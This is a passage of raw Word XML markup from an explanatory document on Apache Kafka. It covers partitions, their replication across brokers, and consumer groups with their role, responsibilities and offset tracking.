          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Partitions allow Kafka to distribute data across multiple brokers and handle high throughput. Each partition can be independently read by different consumers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADC02F9" w14:textId="77777777" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00603C66">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="264"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Partition Responsibilities</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456AEA71" w14:textId="77777777" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00603C66">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="264"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Holds messages ordered by offset.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B0BEAD" w14:textId="77777777" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00603C66">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="264"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Partitions allow parallel data processing and balancing load between brokers and consumers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648FD394" w14:textId="77777777" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00603C66">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="264"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Each partition can be replicated to provide fault tolerance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB4C1B5" w14:textId="77777777" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00603C66" w:rsidP="00603C66">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>How it interacts with other components</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D784101" w14:textId="77777777" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00603C66">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="265"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>producer</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sends messages to a specific </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>partition</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> within a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>topic</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49628DC4" w14:textId="77777777" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00603C66">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="265"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Consumers</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> read messages from specific </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> within a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>topic</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E58034" w14:textId="77777777" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00603C66">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="265"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Partitions are replicated across multiple </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>brokers</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for high availability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53742939" w14:textId="77777777" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00603C66">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="0BB1EA8D">
          <v:rect id="_x0000_i3070" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABFF73E" w14:textId="77777777" w:rsidR="007D5085" w:rsidRPr="00CE4B95" w:rsidRDefault="007D5085" w:rsidP="00603C66">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E60E6A7" w14:textId="77777777" w:rsidR="007D5085" w:rsidRPr="00CE4B95" w:rsidRDefault="007D5085" w:rsidP="00603C66">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A5E63D9" w14:textId="717CDE16" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00603C66" w:rsidP="00603C66">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>6. Consumer Group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02294424" w14:textId="77777777" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00603C66">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="266"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Definition</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: A </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>consumer group</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a group of consumers that work together to consume messages from a Kafka topic. Each consumer in a group is assigned one or more partitions, and each message is consumed by only one consumer in the group.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0427D76C" w14:textId="77777777" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00603C66">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="266"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Role</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The main role of consumer groups is to allow multiple consumers to share the load of reading messages from Kafka topics while ensuring that each message is processed only once by the group. This enables parallel message processing while maintaining message ordering within a partition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07800283" w14:textId="77777777" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00603C66">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="266"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Consumer Group Responsibilities</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54ED0F81" w14:textId="77777777" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00603C66">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="266"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Distributes the load of consuming messages among multiple consumers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2578B417" w14:textId="77777777" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00603C66">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="266"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Ensures that each message in a partition is processed only once (no duplication).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A19C57" w14:textId="77777777" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00603C66">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="266"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Allows for horizontal scaling (more consumers) in the processing pipeline.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF7821C" w14:textId="77777777" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00603C66" w:rsidP="00603C66">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>How it interacts with other components</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E47311B" w14:textId="77777777" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00603C66">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="267"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Consumers</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> join a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>consumer group</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and subscribe to a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>topic</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C33B6D7" w14:textId="77777777" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00603C66">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="267"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Kafka assigns </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to consumers in the group, and each consumer reads messages from a specific partition of the topic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FA54BB" w14:textId="77777777" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00603C66">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="267"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Offsets</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are managed per consumer group to track consumption progress.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C91893D" w14:textId="77777777" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00603C66">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="437FE443">
          <v:rect id="_x0000_i3071" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
